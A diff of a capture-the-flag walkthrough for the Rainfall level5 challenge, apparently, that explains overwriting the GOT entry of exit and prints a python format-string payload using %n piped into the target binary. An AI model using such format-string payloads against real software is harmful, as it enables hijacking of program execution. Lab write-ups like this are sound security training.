C-Chafik/rainfall/level5/walkthrough.md

 And the address of exit 0x80483d0.

-We try to overwrite exit, and not the return of main(), since obviously...
-We wont go back to back because of the exit
+We want to overwrite exit, and not the return of main(), since obviously...
+We wont go back to main after the exit.

-So we are going to overwrite exit with o address.

 ```sh
 $ (python -c "print '\xd0\x83\x04\x08' + '%134513824x' + '%4\$n'"; cat) | ./level5